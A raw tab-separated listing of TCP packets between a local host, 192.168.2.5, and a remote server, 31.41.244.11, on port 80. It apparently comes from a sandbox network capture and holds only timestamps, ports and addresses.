Dec 17, 2024 06:03:21.649185896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.650134087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.650149107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.650247097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.651201963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.651288986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.651355982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.652266026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.652348042 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.652384043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.652714014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.653362036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.653435946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.653470039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.653980017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.654558897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.654649019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.654683113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.654742002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.655637026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.655730009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.655764103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.655838013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.656826973 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.656919003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.656954050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.657037973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.657855988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.657948017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.657979965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.658026934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.659029007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.659071922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.659096003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.659149885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.660147905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.660161972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.660239935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.660239935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.661231041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.661310911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.661375046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.661375046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.662357092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.662457943 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.662492990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.662667990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.663445950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.663544893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.663580894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.663752079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.664566040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.664632082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.664663076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.664747953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.665685892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.665730000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.665754080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.665807009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.666766882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.666862011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.666898966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.667000055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.667915106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.667979956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.668013096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.668081045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.668988943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.669056892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.669090033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.669171095 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.670085907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.670177937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.670212984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.670299053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.671370983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.671387911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.671420097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.671420097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.672358036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.672456980 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.672488928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.672552109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.673511028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.673582077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.673619986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.673619986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.674555063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.674618959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.674756050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.674804926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.675684929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.675787926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.675832033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.676176071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.676820040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.676871061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.676904917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.676955938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.677898884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.677948952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.811661959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.811681032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.811747074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.811770916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.811853886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.811956882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.812062979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.812995911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.813102007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.813138008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.814091921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.814193010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.814373970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.814977884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.814995050 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.815038919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.815038919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.816011906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.816095114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.816167116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.817163944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.817250013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.817414045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.818259954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.818315029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.818350077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.819369078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.819447041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.819475889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.819614887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.820759058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.821053028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.821160078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.821564913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.821640015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.821680069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.822679043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.822774887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.822799921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.823766947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.823786974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.823928118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.823940992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.824501991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.824877024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.824985027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.824996948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.825126886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.825987101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.826040030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.826108932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.826174974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.827141047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.827259064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.827343941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.828278065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.828346968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.828412056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.828592062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.829368114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.829505920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.829600096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.829662085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.830497026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.830621004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.830699921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.831633091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.831800938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.831842899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.831912041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.832710028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.832828045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.832864046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.832864046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.833833933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.833884954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.833960056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.834008932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.834914923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.835042953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.835098982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.835098982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.836025000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.836199999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.836204052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.836329937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.837141037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.837203026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.837235928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.837279081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.838268995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.838356018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.838423014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.839391947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.839538097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.839612961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.840481997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.840533972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.840598106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.840673923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.841595888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.841703892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.841710091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.841830015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.842710018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.842803001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.842818975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.842869043 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.843843937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.843941927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.844054937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.844326019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.844957113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.845043898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.845117092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.846061945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.846184015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.846281052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.847189903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.847306013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.847337961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.847361088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.848305941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.848401070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.848445892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.848481894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.849420071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.849509001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.849539995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.849598885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.850506067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.850577116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.850604057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.850616932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.851650953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.851797104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.851804972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.851897955 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.852720976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.852854013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.852973938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.853852987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.853960991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.854060888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.854945898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.855050087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.855066061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.855348110 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.856100082 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.856188059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.856261015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.856383085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.857280016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.857331038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.857336998 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.857418060 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.858295918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.858382940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.858417034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.858527899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.859443903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.859560013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.859627008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.860519886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.860599995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.860662937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.861692905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.861758947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.861803055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.862654924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.862746954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.862849951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.862873077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.862916946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.863863945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.863951921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.863980055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.864356995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.864979029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.865031958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.865098953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.865201950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.866084099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.866190910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.866507053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.866507053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.867183924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.867302895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.867361069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.868319988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.868405104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.868426085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.868748903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.869424105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.869502068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.869523048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.869539976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.003781080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.003870010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.003953934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.004015923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.004110098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.004164934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.004192114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.004292965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.005186081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.005249977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.005259037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.005311966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.006306887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.006426096 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.006455898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.006516933 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.007412910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.007458925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.007530928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.007599115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.008503914 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.008652925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.008754015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.008754015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.009629965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.009685993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.009737015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.009907961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.010725021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.010834932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.010859013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.010942936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.011879921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.011972904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.012010098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.012599945 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.012995958 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.013104916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.013173103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.013173103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:22.014074087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:22.014141083 CET	49850	80	192.168.2.5	31.41.244.11
